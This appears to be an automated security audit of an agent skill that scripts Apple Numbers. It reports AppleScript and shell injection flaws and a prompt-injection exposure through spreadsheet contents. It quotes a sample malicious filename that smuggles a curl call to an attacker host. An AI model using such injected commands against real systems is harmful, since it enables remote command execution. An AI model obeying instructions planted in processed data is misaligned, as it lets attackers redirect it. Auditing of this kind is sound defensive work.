NYC

automating-numbers

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH
Categories: COMMAND_EXECUTION, DATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): AppleScript Injection vulnerability in multiple Python scripts.
      • Evidence: scripts/create_numbers_spreadsheet.py, scripts/export_numbers_to_csv.py, and scripts/read_numbers_spreadsheet.py use f-strings to construct AppleScript strings executed via osascript.
      • Details: User-provided variables like save_path, input_file, and file_path are resolved using Path.resolve() but are not escaped for double quotes. An attacker providing a filename such as `test.numbers" & (do shell script "curl http://attacker.com/ex") & "` could execute arbitrary shell commands on the host.
  • [COMMAND_EXECUTION] (HIGH): Shell Injection in JXA script.
      • Evidence: scripts/create_skills_spreadsheet.js uses app.doShellScript with template literals containing file paths retrieved from the system.
      • Details: The script iterates through file paths found via find and interpolates them directly into a stat command: app.doShellScript("stat -f%z '${filePath}'..."). If a file or directory name contains shell metacharacters (e.g., backticks or semicolons), it results in arbitrary command execution.
  • [DATA_EXFILTRATION] (LOW): Information exposure through hardcoded local paths.
      • Evidence: scripts/create_skills_spreadsheet.js hardcodes a specific absolute path: /Users/richardhightower/clients/spillwave/....
      • Details: This exposes the local username and internal directory structure of the developer's environment to the agent and potentially to users of the skill.
  • [INDIRECT_PROMPT_INJECTION] (LOW): Susceptibility to malicious content in processed data.
      • Ingestion points: scripts/read_numbers_spreadsheet.py (reads spreadsheet cell values) and scripts/create_skills_spreadsheet.js (reads file system metadata).
      • Boundary markers: Absent. There are no delimiters or instructions to the LLM to ignore instructions embedded within the spreadsheet data.
      • Capability inventory: The skill has Bash, Read, and Write permissions, and can execute system-level automation via AppleScript and shell scripts.
      • Sanitization: None. Data is read from external files and processed or printed without escaping or validation.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 06:27 PM